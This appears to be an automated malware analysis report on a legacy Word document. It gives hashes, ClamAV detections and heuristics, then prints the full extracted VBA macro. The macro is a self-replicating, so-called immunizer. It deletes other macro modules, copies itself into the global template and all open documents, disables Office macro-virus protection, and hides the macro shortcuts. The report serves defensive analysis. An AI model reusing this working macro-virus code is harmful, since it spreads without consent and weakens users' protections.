Office (OLE) malware analysis — malicious · c7c5a57a1c204e42

MALICIOUS

Office (OLE)

51.5 KB Created: 2003-06-17 08:25:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 343e9cb0884e3283df848810648e8153 SHA-1: 17f9e77e7ab5d5640f6551c66e4a05fa5f7de860 SHA-256: c7c5a57a1c204e42d7ca4189536012d16f52cd38a652cc948b35da7bfe7377fa

248 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with signatures 'Doc.Trojan.Opey-20' and 'Win.Trojan.C-286'. It contains a legacy WordBasic macro and VBA macros, including an AutoOpen macro, indicating a potential for automated execution upon opening. The extracted VBA script, named 'JiShenhua3', appears to be designed to immunize the system by deleting other macro modules, which is a common tactic used by malware to evade detection or remove competing malware.

Heuristics 5

ClamAV: Doc.Trojan.Opey-20 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Opey-20
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
                NormalTemplate.VBProject.VBComponents(I).CodeModule.DeleteLines 1, LinesofCode
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6920 bytes
SHA-256: `8dd7dc95782f5aed83ea82cea6d315bba2a9080f6977833b4ddb9b3c7f1ae582`
Detection ClamAV: Win.Trojan.C-286 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "JiShenhua3" ' ------------------------------------------------------------------------------------ ' 原作: FoxChit SOFTWARE SOLUTIONS ' 作者: Ulysses R. Gotera ' 程序改进: 冀慎华 ' 日期: 2001年3月 ' 功能: 该程序把WORD菜单与工具条初始化到原来状态并删除本模块以外的宏模块. '------------------------------------------------------------------------------------- Sub Immunize() On Error Resume Next Dim DocuName$, OpenDocImmunized As Boolean Dim I%, J%, NmImmunized As Boolean Dim LinesofCode As Integer Dim openDoc As Document NmImmunized = False For I = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1 DocuName = NormalTemplate.VBProject.VBComponents(I).Name Select Case DocuName Case "JiShenhua3" NmImmunized = True Case "ThisDocument" LinesofCode = NormalTemplate.VBProject.VBComponents(I).CodeModule.CountOfLines If LinesofCode > 0 Then NormalTemplate.VBProject.VBComponents(I).CodeModule.DeleteLines 1, LinesofCode End If Case "VirusReport", "JiShenhua" '旧版本杀病毒程序 Application.OrganizerDelete _ Source:=NormalTemplate.FullName, Name:=DocuName _ , Object:=wdOrganizerObjectProjectItems Case Else msg = "你的 Word 系统中附带有宏程序模块 " + DocuName + _ ", 极有可能是宏病毒,请选择 '是' 清除该病毒." If MsgBox(msg, vbYesNo, "冀慎华向您报告:") = vbYes Then Application.OrganizerDelete _ Source:=NormalTemplate.FullName, Name:=DocuName _ , Object:=wdOrganizerObjectProjectItems End If End Select Next I For Each openDoc In Documents OpenDocImmunized = False With openDoc For J = openDoc.VBProject.VBComponents.Count To 1 Step -1 DocuName = openDoc.VBProject.VBComponents(J).Name Select Case DocuName Case "JiShenhua3" OpenDocImmunized = True Case "ThisDocument" LinesofCode = openDoc.VBProject.VBComponents(J).CodeModule.CountOfLines If LinesofCode > 0 Then openDoc.VBProject.VBComponents(J).CodeModule.DeleteLines 1, LinesofCode End If Case "Reference to Normal" Case "VirusReport", "JiShenhua" '旧版本杀病毒程序 Application.OrganizerDelete Source:=openDoc.FullName, _ Name:=DocuName, Object:=wdOrganizerObjectProjectItems Case Else msg = "您的文件 <" + openDoc.Name + "> 中附带有 Word 宏模块 " + DocuName + _ ", 极有可能是宏病毒,请选择 '是' 清除该病毒." If MsgBox(msg, vbYesNo, "冀慎华向您报告:") = vbYes Then Application.OrganizerDelete Source:=openDoc.FullName, _ Name:=DocuName, Object:=wdOrganizerObjectProjectItems End If End Select Next J If Not OpenDocImmunized Then Application.OrganizerCopy Source:=NormalTemplate.FullName, _ Destination:=openDoc.FullName, _ Name:="JiShenhua3", _ Object:=wdOrganizerObjectProjectItems ' If Not openDoc.Saved Then openDoc.SaveAs FileName:=openDoc.FullName End If End With Next openDoc If Not NmImmunized Then Application.OrganizerCopy Source:=ActiveDocument.FullName, _ Destination:=NormalTemplate.FullName, Name:="JiShenhua3", _ Object:=wdOrganizerObjectProjectItems If Not NormalTemplate.Saved Then NormalTemplate.Save End If End Sub Sub Initialize() On Error Resume Next Application.DisplayAlerts = wdAlertsAll WordBasic.DisableAutoMacros -1 With Application .UserAddress = "冀慎华已为您的机器自动安装了反宏病毒程序,事前未征求您的同意,请见谅." End With With Dialogs(wdDialogFileSummaryInfo) .Comments = "该文件已附带了冀慎华编写的反宏病毒程序,事前未征求您的同意,请见谅." .Execute End With With Options .ConfirmConversions = True .VirusProtection = False .SaveNormalPrompt = False End With With ActiveDocument .ReadOnlyRecommended = False End With With CommandBars("Visual Basic") .Enabled = True .Protection = msoBarTypeMenuBar .Protection = msoBarMenuBar End With With CommandBars("Tools") .Reset .Controls("Macro").Reset .Controls("Customize...").Reset .Controls("宏(&M)").Reset .Controls("自定义(&C)...").Reset End With FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Clear FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Clear CustomizationContext = NormalTemplate End Sub Sub AutoExec() On Error Resume Next Call Initialize Call Immunize End Sub Sub AutoNew() On Error Resume Next Call Initialize Call Immunize Dialogs(wdDialogFileNew).Show Call Immunize End Sub Sub FileNew() On Error Resume Next Call Initialize Call Immunize Dialogs(wdDialogFileNew).Show Call Immunize End Sub Sub AutoOpen() On Error Resume Next Call Initialize Call Immunize End Sub Sub FileOpen() On Error Resume Next Call Initialize Call Immunize Dialogs(wdDialogFileOpen).Show Call Immunize End Sub Sub FileSave() On Error Resume Next Call Initialize Call Immunize If Not ActiveDocument.Saved Then ActiveDocument.Save End Sub Sub FileSaveAs() On Error Resume Next Call Initialize Call Immunize Dialogs(wdDialogFileSaveAs).Show Call Immunize End Sub 'Sub FileClose() 'On Error Resume Next ' Call Initialize ' Call Immunize ' If Not ActiveDocument.Saved Then ActiveDocument.Save ' ActiveDocument.Close 'End Sub 'Sub FileExit() 'On Error Resume Next ' Call Initialize ' Call Immunize ' If Not ActiveDocument.Saved Then ActiveDocument.Save ' FoxChitForm.Show ' Application.Quit 'End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.